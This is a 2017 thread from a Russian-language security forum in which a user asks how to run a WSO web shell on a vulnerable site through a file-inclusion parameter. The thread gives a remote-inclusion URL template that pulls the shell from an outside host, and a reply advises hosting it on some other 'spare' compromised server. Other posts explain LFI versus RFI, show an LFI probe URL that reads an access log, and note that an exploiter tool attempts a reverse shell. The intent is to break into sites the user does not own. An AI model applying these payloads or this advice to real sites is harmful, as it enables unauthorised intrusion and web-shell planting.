HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.11.2017, 21:05
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

httр://уязвимый-сайт/?переменная=http://сайт_где_у_нас.шелл/ну_и_сам.шелл

Если я shell залью на localhost то есть на свой сервер xampp (который стоит на пк)

httр://уязвимый-сайт/?переменная=http://localhost/WSO.php


Так подействует или нужен сайт с доменом ?

.SpoilerTarget" type="button">Spoiler: Скриншот
https://s8.hostingkartinok.com/uploa...fdf5538e78.png
 
Ответить с цитированием

  #2  
Старый 09.11.2017, 21:31
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

на локалхосте не подействует

найди какой-нибудь левый шелл ненужный и туда залей , оттуда уже дернешь напрямую/ Но это надо чтобы было RFI
 
Ответить с цитированием

  #3  
Старый 09.11.2017, 21:34
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от grimnir  
grimnir said:

на локалхосте не подействует
найди какой-нибудь левый шелл ненужный и туда залей , оттуда уже дернешь напрямую
Ссылку на shell надо ставить за место search так же ? (на скрине показан лог уязвимости)
 
Ответить с цитированием

  #4  
Старый 09.11.2017, 21:37
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

на скрине у тебя LFI а не RFI http://insafety.org/lfi.php

локальный инклуд означает, что есть возможность подключать и исполнять или читать файлы только в пределах уязвимого сервера по относительному пути к файлам (а точнее в пределах заданной в конфиге php open_basedir, ибо она ограничивает доступные интерпретатору каталоги). При удалённом инклуде есть возможность подключать произвольные файлы с других серверов по их URL-адресам. RFI встречается гораздо реже, чем LFI и считается более опасной уязвимостью.
 
Ответить с цитированием

  #5  
Старый 09.11.2017, 21:45
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от grimnir  
grimnir said:

на скрине у тебя LFI а не RFI
http://insafety.org/lfi.php
локальный инклуд означает, что есть возможность подключать и исполнять или читать файлы только в пределах уязвимого сервера по относительному пути к файлам (а точнее в пределах заданной в конфиге php
open_basedir
, ибо она ограничивает доступные интерпретатору каталоги). При удалённом инклуде есть возможность подключать произвольные файлы с других серверов по их URL-адресам. RFI встречается гораздо реже, чем LFI и считается более опасной уязвимостью.
Получается залить или выполнить Shell я не могу
 
Ответить с цитированием

  #6  
Старый 09.11.2017, 22:46
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от grimnir  
grimnir said:

на скрине у тебя LFI а не RFI
http://insafety.org/lfi.php
локальный инклуд означает, что есть возможность подключать и исполнять или читать файлы только в пределах уязвимого сервера по относительному пути к файлам (а точнее в пределах заданной в конфиге php
open_basedir
, ибо она ограничивает доступные интерпретатору каталоги). При удалённом инклуде есть возможность подключать произвольные файлы с других серверов по их URL-адресам. RFI встречается гораздо реже, чем LFI и считается более опасной уязвимостью.
Эксплоиты или софт есть под эксплуатацию LFI не знаешь ? под win желательно не знаешь ? я один нашёл но он для линукса
 
Ответить с цитированием

  #7  
Старый 10.11.2017, 00:00
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

 
Ответить с цитированием

  #8  
Старый 10.11.2017, 04:26
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Выбрал скан указал месте славоря, всё правильно сделал ?

.SpoilerTarget" type="button">Spoiler: Фото
https://s8.hostingkartinok.com/uploa...ff8c2aaa5b.png
 
Ответить с цитированием

  #9  
Старый 10.11.2017, 04:34
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Дал ссылку пишет что уязвимый только вот не чем не отличается от других ссылок, в чём прикол ?

http://www.site.ru/search?q=/usr/loc...ogs/access_log

И ещё не до конца понимаю что значит

1) Exploiter

2) Scanner

типа 1 это эксплуатация, а 2 это сканер
 
Ответить с цитированием

  #10  
Старый 11.11.2017, 14:37
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Exploiter пробует установить reverse shell

По поводу линка, высокая вероятность ложного срабатывания, т.к запрос идет поиск search?q= и сканеры очень часто пишут что возможно LFI ,но на деле не так
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ